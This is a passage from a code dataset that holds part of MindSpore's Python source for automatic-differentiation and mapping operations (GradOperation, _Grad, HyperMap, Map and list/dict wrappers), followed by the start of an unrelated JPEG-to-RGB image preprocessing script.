1.5999999 6.6 ]\n [1.4100001 1.5999999 6.6 ]]\n >>>\n >>> class GradNetWrtXY(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXY, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.1, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXY(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00],\n [ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 2.59999990e+00, 2.59999990e+00, 2.59999990e+00],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]]))\n >>>\n >>> class GradNetWrtXYWithSensParam(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXYWithSensParam, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True, sens_param=True)\n ... self.grad_wrt_output = Tensor([[0.1, 0.6, 0.2], [0.8, 1.3, 1.1]], dtype=mstype.float32)\n ... def construct(self, x, y):\n ... 
gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y, self.grad_wrt_output)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXYWithSensParam(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 2.21099997e+00, 5.09999990e-01, 1.49000001e+00],\n [ 5.58800030e+00, 2.68000007e+00, 4.07000017e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 1.51999998e+00, 2.81999993e+00, 2.14000010e+00],\n [ 1.09999990e+00, 2.04999995e+00, 1.54999995e+00],\n [ 9.00000036e-01, 1.54999995e+00, 1.25000000e+00]]))\n >>>\n >>> class GradNetWithWrtParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWithWrtParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWithWrtParams(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[1], dtype=Float32, value= [ 2.15359993e+01]),)\n >>>\n >>> class GradNetWrtInputsAndParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtInputsAndParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_all=True, get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... 
return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.1, 0.6, 1.2], [0.5, 1.3, 0.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.12, 2.3, 1.1], [1.3, 0.2, 2.4], [0.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtInputsAndParams(Net())(x, y)\n >>> print(output)\n ((Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00],\n [ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 6.00000024e-01, 6.00000024e-01, 6.00000024e-01],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]])), (Tensor(shape=[1], dtype=Float32, value=\n [ 1.29020004e+01]),))\n \"\"\"\n\n def __init__(self, get_all=False, get_by_list=False, sens_param=False):\n \"\"\"Initialize GradOperation.\"\"\"\n if not isinstance(get_all, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_all' should be bool, but got {type(get_all).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For 'GradOperation', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n self.get_all = get_all\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n GradOperation_.__init__(self, 'grad', get_all, get_by_list, sens_param, False, False, False, False)\n self.grad_fn = None\n self.fn = None\n self.weights_id = None\n self.pynative_ = False\n self.grad_position = (0,)\n\n def __call__(self, fn, weights=None):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.weights_id == weights_id:\n return self.grad_fn\n grad_ = GradOperation(self.get_all, self.get_by_list, self.sens_param)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n fn.grad_ops_label = True\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, self.grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n return out\n else:\n grad_.pynative_ = True\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n 
return grad_(fn)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward run to build grad graph. \"\"\"\n new_kwargs = kwargs\n if self.sens_param:\n if 'sens' not in kwargs.keys():\n args = args[:-1]\n else:\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n output = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, output, *args, **new_kwargs)\n else:\n # Check if fn have run already\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n fn.set_grad()\n fn(*args, **new_kwargs)\n fn.set_grad(False)\n\n\nclass _TaylorOperation(TaylorOperation_):\n \"\"\"\n Generate the higher order derivatives function for the input function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize TaylorOperation.\"\"\"\n TaylorOperation_.__init__(self, 'taylorgrad')\n self.grad_fn = None\n self.fn = None\n\n def __call__(self, fn):\n if self.grad_fn is not None and self.fn == fn:\n return self.grad_fn\n taylor_grad_ = _TaylorOperation()\n\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n\n @jit\n def after_taylor_grad(*args):\n return taylor_grad_(fn)(*args)\n\n self.grad_fn = after_taylor_grad\n self.fn = fn\n return self.grad_fn\n\n\ndef _combine_weight(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for weight, when return_ids is set to True. \"\"\"\n weight_tuple = []\n position = 0\n if isinstance(weights, (list, ParameterTuple, tuple)) and grad_position:\n for weight in weights:\n weight_tuple.append((weight.name, out[1][position]))\n position += 1\n elif isinstance(weights, (list, ParameterTuple, tuple)):\n for weight in weights:\n weight_tuple.append((weight.name, out[position]))\n position += 1\n elif grad_position:\n weight_tuple.append(weights.name)\n weight_tuple.append(out[1])\n else:\n weight_tuple.append(weights.name)\n weight_tuple.append(out)\n if grad_position:\n out_with_ids.append(tuple(weight_tuple))\n else:\n out_with_ids = weight_tuple\n return out_with_ids\n\n\ndef _combine_position(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for position, when return_ids is set to True. \"\"\"\n position_tuple = []\n position = 0\n if grad_position == (0,) and weights is not None:\n position_tuple.append(0)\n position_tuple.append(out[0])\n elif grad_position == (0,):\n position_tuple.append(0)\n position_tuple.append(out)\n elif weights is not None:\n for index in grad_position:\n position_tuple.append((index, out[0][position]))\n position += 1\n else:\n for index in grad_position:\n position_tuple.append((index, out[position]))\n position += 1\n if weights:\n out_with_ids.append(tuple(position_tuple))\n else:\n out_with_ids = position_tuple\n return out_with_ids\n\n\ndef _combine_with_ids(grad_position, weights, out):\n \"\"\" Making resulting tuple, when return_ids is set to True. 
\"\"\"\n out_with_ids = []\n if grad_position:\n out_with_ids = _combine_position(\n grad_position, weights, out, out_with_ids)\n if weights is not None:\n out_with_ids = _combine_weight(\n grad_position, weights, out, out_with_ids)\n if not out_with_ids:\n raise ValueError(f\"output tuple should not be a empty tuple.\")\n return tuple(out_with_ids)\n\n\nclass _Grad(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function by position for the input function.\n \"\"\"\n\n def __init__(self, get_by_list=False, sens_param=False, get_by_position=False, has_aux=False, get_value=False,\n return_ids=False):\n \"\"\"Initialize _Grad.\"\"\"\n if not isinstance(get_by_position, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_position' should be bool, \"\n f\"but got {type(get_by_position).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For '_Grad', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n if not isinstance(has_aux, bool):\n raise TypeError(f\"For '_Grad', the 'has_aux' should be bool, \"\n f\"but got {type(has_aux).__name__}\")\n if not isinstance(get_value, bool):\n raise TypeError(f\"For '_Grad', the 'get_value' should be bool, \"\n f\"but got {type(get_value).__name__}\")\n if not isinstance(return_ids, bool):\n raise TypeError(f\"For '_Grad', the 'return_ids' should be bool, \"\n f\"but got {type(return_ids).__name__}\")\n self.get_by_position = get_by_position\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n self.has_aux = has_aux\n self.get_value = get_value\n self.return_ids = return_ids\n GradOperation_.__init__(self, 'grad', False, get_by_list, sens_param, get_by_position, has_aux, get_value,\n return_ids)\n self.grad_fn = None\n self.fn = None\n self.pynative_ = False\n self.grad_position = None\n self.weights_id = None\n\n def __call__(self, fn, weights=None, grad_position=0):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.grad_position == grad_position and \\\n self.weights_id == weights_id:\n return self.grad_fn\n\n def aux_fn(*args):\n outputs = fn(*args)\n if not isinstance(outputs, tuple) or len(outputs) < 2:\n raise ValueError(\"When has_aux is True, origin fn requires more than one outputs.\")\n res = (outputs[0],)\n stop_gradient = Primitive(\"StopGradient\")\n for item in outputs[1:]:\n res += (stop_gradient(item),)\n return res\n\n grad_ = _Grad(self.get_by_list, self.sens_param, self.get_by_position, self.has_aux, self.get_value,\n self.return_ids)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n if self.get_by_position:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn, weights, grad_position)(*args)\n else:\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def 
after_grad(*args):\n return grad_(fn, weights)(*args)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args):\n return grad_(fn)(*args)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n res = self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n if self.return_ids and out:\n out = _combine_with_ids(grad_position, weights, out)\n if self.get_value:\n return res, out\n if self.has_aux:\n return out, res[1:]\n return out\n else:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n grad_.pynative_ = True\n fn_ = fn\n if self.has_aux:\n fn_ = aux_fn\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_position:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights, grad_position)(*args, **kwargs)\n else:\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn_, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn_)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.grad_position = grad_position\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward runs to build grad graph. \"\"\"\n new_kwargs = kwargs\n outputs = ()\n if self.sens_param:\n if 'sens' in kwargs.keys():\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n else:\n args = args[:-1]\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n outputs = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, outputs, *args, **new_kwargs)\n return outputs\n else:\n # Check if fn has run already.\n if not _pynative_executor.check_run(grad, fn, weights, self.grad_position, *args, **new_kwargs):\n fn.set_grad()\n outputs = fn(*args, **new_kwargs)\n fn.set_grad(False)\n return outputs\n if (self.get_value or self.has_aux) and not outputs:\n outputs = fn(*args, **new_kwargs)\n return outputs\n\n\nclass _Vmap(VmapOperation_):\n \"\"\"\n A higher-order function which is used to generate the vectorizing map function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize _Vmap.\"\"\"\n VmapOperation_.__init__(self, 'vmap')\n self.vmap_fn = None\n self.fn = None\n self.in_axes = None\n self.out_axes = None\n\n def __call__(self, fn, in_axes=0, out_axes=0):\n if self.vmap_fn is not None and self.fn == fn and self.in_axes == in_axes and self.out_axes == out_axes:\n return self.vmap_fn\n\n vmap_ = self\n\n @jit\n def after_vmap(*args, **kwargs):\n return vmap_(fn, in_axes, out_axes)(*args, **kwargs)\n\n self.vmap_fn = after_vmap\n self.fn = fn\n self.in_axes = in_axes\n self.out_axes = out_axes\n return self.vmap_fn\n\n\nclass MultitypeFuncGraph(MultitypeFuncGraph_):\n \"\"\"\n MultitypeFuncGraph is a class used to generate overloaded functions, considering different types as inputs.\n Initialize an `MultitypeFuncGraph` object with name, and use `register` with input types as the decorator\n for the function to be registered. 
And the object can be called with different types of inputs,\n and work with `HyperMap` and `Map`.\n\n Args:\n name (str): Operator name.\n read_value (bool, optional): If the registered function do not need to set value on Parameter,\n and all inputs will pass by value, set `read_value` to ``True`` . Default: ``False`` .\n\n Raises:\n ValueError: If failed to find a matching function for the given arguments.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> # `add` is a metagraph object which will add two objects according to\n >>> # input type using \".register\" decorator.\n >>> from mindspore import Tensor\n >>> from mindspore import ops\n >>> from mindspore import dtype as mstype\n >>> import mindspore.ops as ops\n >>>\n >>> tensor_add = ops.Add()\n >>> add = ops.MultitypeFuncGraph('add')\n >>> @add.register(\"Number\", \"Number\")\n ... def add_scala(x, y):\n ... return x + y\n >>> @add.register(\"Tensor\", \"Tensor\")\n ... def add_tensor(x, y):\n ... return tensor_add(x, y)\n >>> output = add(1, 2)\n >>> print(output)\n 3\n >>> output = add(Tensor([0.1, 0.6, 1.2], dtype=mstype.float32), Tensor([0.1, 0.6, 1.2], dtype=mstype.float32))\n >>> print(output)\n [0.2 1.2 2.4]\n \"\"\"\n\n def __init__(self, name, read_value=False, need_raise=False):\n \"\"\"Initialize MultitypeFuncGraph.\"\"\"\n MultitypeFuncGraph_.__init__(self, name, need_raise)\n self.entries = list()\n if read_value:\n self.set_signatures((\n sig.make_sig('args', sig.sig_rw.RW_READ, sig.sig_kind.KIND_VAR_POSITIONAL),))\n\n def __call__(self, *args):\n if len(self.entries) == 1:\n output = self.entries[0][1](*args)\n return output\n types = tuple(map(mstype.get_py_obj_dtype, args))\n for sigs, fn in self.entries:\n if len(sigs) != len(types):\n continue\n if any(not mstype._issubclass_(type_, sig) for sig, type_ in zip(sigs, types)): # pylint: disable=W0212\n continue\n output = fn(*args)\n return output\n raise ValueError(f\"For 'MultitypeFuncGraph', cannot find fn match given args. Got (sigs, fn): {self.entries}, \"\n f\"and (dtype, args): {types}.\")\n\n def register(self, *type_names):\n \"\"\"\n Register a function for the given type string.\n\n Args:\n type_names (Union[str, :class:`mindspore.dtype`]): Inputs type names or types list.\n\n Return:\n decorator, a decorator to register the function to run, when called under the\n types described in `type_names`.\n \"\"\"\n\n def deco(fn):\n def convert_type(type_input):\n if isinstance(type_input, str):\n return mstype.typing.str_to_type(type_input)\n if not isinstance(type_input, mstype.Type):\n raise TypeError(f\"For 'MultitypeFuncGraph', register only support str or {mstype.Type}, but got \"\n f\"'type_input': {type_input}.\")\n return type_input\n\n types = tuple(map(convert_type, type_names))\n self.register_fn(type_names, fn)\n self.entries.append((types, fn))\n return fn\n\n return deco\n\n # pylint: disable=missing-docstring\n def set_doc_url(self, doc_url):\n self.set_doc_url_(doc_url)\n\n\nclass HyperMap(HyperMap_):\n \"\"\"\n Hypermap will apply the set operation to input sequences.\n\n Apply the operations to every element of the sequence or nested sequence. Different\n from `mindspore.ops.Map`, the `HyperMap` supports to apply on nested structure.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. 
Default is None.\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is False.\n\n Inputs:\n - **args** (Tuple[sequence]) -\n\n - If `ops` is not `None`, all the inputs should be sequences with the same length.\n And each row of the sequences will be the inputs of the operation.\n - If `ops` is `None`, the first input is the operation, and the others are inputs.\n\n Note:\n Except for the operation input, the number of inputs should be equal to the number of inputs to `ops`.\n\n Outputs:\n Sequence or nested sequence, the sequence of output after applying the function.\n e.g. `operation(args[0][i], args[1][i])`.\n\n Raises:\n TypeError: If `ops` is neither MultitypeFuncGraph nor None.\n TypeError: If `args` is not a Tuple.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> from mindspore import Tensor, ops\n >>> from mindspore import dtype as mstype\n >>> nest_tensor_list = ((Tensor(1, mstype.float32), Tensor(2, mstype.float32)),\n ... (Tensor(3, mstype.float32), Tensor(4, mstype.float32)))\n >>> # square all the tensor in the nested list\n >>>\n >>> square = ops.MultitypeFuncGraph('square')\n >>> @square.register(\"Tensor\")\n ... def square_tensor(x):\n ... return ops.square(x)\n >>>\n >>> common_map = ops.HyperMap()\n >>> output = common_map(square, nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n >>> square_map = ops.HyperMap(square, False)\n >>> output = square_map(nest_tensor_list)\n >>> print(output)\n ((Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4)),\n (Tensor(shape=[], dtype=Float32, value= 9), Tensor(shape=[], dtype=Float32, value= 16)))\n \"\"\"\n\n def __init__(self, ops=None, reverse=False):\n \"\"\"Initialize HyperMap.\"\"\"\n self.ops = ops\n if ops:\n HyperMap_.__init__(self, reverse, ops)\n else:\n HyperMap_.__init__(self, reverse)\n\n def __call__(self, *args):\n func = self.ops\n args_list = args\n hypermap = self\n if self.ops is None:\n func = args[0]\n args_list = args[1:]\n hypermap = partial(self, func)\n # is leaf\n if not isinstance(args_list[0], (tuple, list)):\n return func(*args_list)\n return tuple(map(hypermap, *args_list))\n\n\nclass Map(Map_):\n \"\"\"\n Map will apply the set operation on input sequences.\n\n Apply the operations to every element of the sequence.\n\n Args:\n ops (Union[MultitypeFuncGraph, None]): `ops` is the operation to apply. If `ops` is `None`,\n the operations should be put in the first input of the instance. Default: ``None`` .\n reverse (bool): The optimizer needs to be inverted in some scenarios to improve parallel performance,\n general users please ignore. `Reverse` is the flag to decide if apply the operation reversely.\n Only supported in graph mode. Default is ``False`` .\n\n Inputs:\n - **args** (Tuple[sequence]) - If `ops` is not `None`, all the inputs should be the same length sequences,\n and each row of the sequences. e.g. 
If the length of args is 2, then for each `i` within the length of the sequences,\n            `(args[0][i], args[1][i])` will be the input of the operation.\n\n            If `ops` is `None`, the first input is the operation, and the others are inputs.\n\n    Outputs:\n        Sequence, the sequence of output after applying the function. e.g. `operation(args[0][i], args[1][i])`.\n\n    Supported Platforms:\n        ``Ascend`` ``GPU`` ``CPU``\n\n    Examples:\n        >>> from mindspore import dtype as mstype\n        >>> from mindspore import Tensor, ops\n        >>> from mindspore.ops import MultitypeFuncGraph, Map\n        >>> tensor_list = (Tensor(1, mstype.float32), Tensor(2, mstype.float32), Tensor(3, mstype.float32))\n        >>> # square all the tensor in the list\n        >>>\n        >>> square = MultitypeFuncGraph('square')\n        >>> @square.register(\"Tensor\")\n        ... def square_tensor(x):\n        ...     return ops.square(x)\n        >>>\n        >>> common_map = Map()\n        >>> output = common_map(square, tensor_list)\n        >>> print(output)\n        (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n        Tensor(shape=[], dtype=Float32, value= 9))\n        >>> square_map = Map(square, False)\n        >>> output = square_map(tensor_list)\n        >>> print(output)\n        (Tensor(shape=[], dtype=Float32, value= 1), Tensor(shape=[], dtype=Float32, value= 4),\n        Tensor(shape=[], dtype=Float32, value= 9))\n    \"\"\"\n\n    def __init__(self, ops=None, reverse=False):\n        \"\"\"Initialize Map.\"\"\"\n        self.ops = ops\n        if ops:\n            Map_.__init__(self, reverse, ops)\n        else:\n            Map_.__init__(self, reverse)\n\n    def __call__(self, *args):\n        func = self.ops\n        args_list = args\n        if self.ops is None:\n            func = args[0]\n            args_list = args[1:]\n        return tuple(map(func, *args_list))\n\n\nclass _ListAppend(ListAppend_):\n    \"\"\"\n    A metafuncgraph class that appends one element to a list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListAppend.\"\"\"\n        ListAppend_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_append = _ListAppend(\"append\")\n\n\nclass _ListInsert(ListInsert_):\n    \"\"\"\n    A metafuncgraph class that inserts one element into a list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListInsert.\"\"\"\n        ListInsert_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_insert = _ListInsert(\"insert\")\n\n\nclass _ListPop(ListPop_):\n    \"\"\"\n    A metafuncgraph class that pops one element from a list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListPop.\"\"\"\n        ListPop_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_pop = _ListPop(\"pop\")\n\n\nclass _ListClear(ListClear_):\n    \"\"\"\n    A metafuncgraph class that clears the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListClear.\"\"\"\n        ListClear_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_list_clear = _ListClear(\"clear\")\n\n\nclass _ListReverse(ListReverse_):\n    \"\"\"\n    A metafuncgraph class that reverses the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListReverse.\"\"\"\n        ListReverse_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_reverse = _ListReverse(\"reverse\")\n\n\n
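# Editorial note (added): the _List*, _Dict*, _Tail and _ZipOperation wrappers in\n# this module appear to be thin Python handles over C++ metafuncgraphs exported\n# from mindspore._c_expression; their Python __call__ bodies are deliberately\n# 'pass' placeholders because dispatch happens inside the compiled graph.\n\n\n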
class _ListExtend(ListExtend_):\n    \"\"\"\n    A metafuncgraph class that appends another list to the end of the list.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ListExtend.\"\"\"\n        ListExtend_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_extend = _ListExtend(\"extend\")\n\n\nclass _DictClear(DictClear_):\n    \"\"\"\n    A metafuncgraph class that clears the dict.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _DictClear.\"\"\"\n        DictClear_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_dict_clear = _DictClear(\"clear\")\n\n\nclass _DictHasKey(DictHasKey_):\n    \"\"\"\n    A metafuncgraph class that checks whether a key is in the dict.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _DictHasKey.\"\"\"\n        DictHasKey_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_haskey = _DictHasKey(\"has_key\")\n\n\nclass _DictUpdate(DictUpdate_):\n    \"\"\"\n    A metafuncgraph class that updates the dict with another dict.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _DictUpdate.\"\"\"\n        DictUpdate_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_update = _DictUpdate(\"update\")\n\n\nclass _DictFromKeys(DictFromKeys_):\n    \"\"\"\n    A metafuncgraph class that creates a new dict from the given sequence and value.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _DictFromKeys.\"\"\"\n        DictFromKeys_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\n_fromkeys = _DictFromKeys(\"fromkeys\")\n\n\nclass _Tail(Tail_):\n    \"\"\"\n    A metafuncgraph class that generates tail elements of the tuple.\n\n    Args:\n        name (str): The name of the metafuncgraph object.\n    \"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _Tail.\"\"\"\n        Tail_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\ntail = _Tail('tail')\n\n\nclass _ZipOperation(ZipOperation_):\n    \"\"\"Generates a tuple of zip iterations for inputs.\"\"\"\n\n    def __init__(self, name):\n        \"\"\"Initialize _ZipOperation.\"\"\"\n        ZipOperation_.__init__(self, name)\n\n    def __call__(self, *args):\n        pass\n\n\nzip_operation = _ZipOperation('zip_operation')\n\"\"\"`zip_operation` will generate a tuple of zip iterations of inputs.\"\"\"\n","repo_name":"mindspore-ai/mindspore","sub_path":"mindspore/python/mindspore/ops/composite/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":44723,"program_lang":"python","lang":"en","doc_type":"code","stars":3831,"dataset":"github-code","pt":"39"} +{"seq_id":"28592621532","text":"\n'''Created on 4/12/23 by Cristian Finley\n   last updated: 4/17/23 '''\n\n#############JPEG to RGB Pre-processing#################\nfrom PIL import Image\nimport numpy as np\n\n'''Turns a JPEG image into an image with width = 400 px and height = 400 px unless otherwise specified\ninputs: \n    filename - image file compatible with Pillow\n    width(optional) - desired image array width\n    height(optional) - desired image array height\nreturns:\n    matrix of RGB px values'''\ndef preprocessImage(filename, width=400, height=400):\n    im = Image.open(filename)\n    # images larger 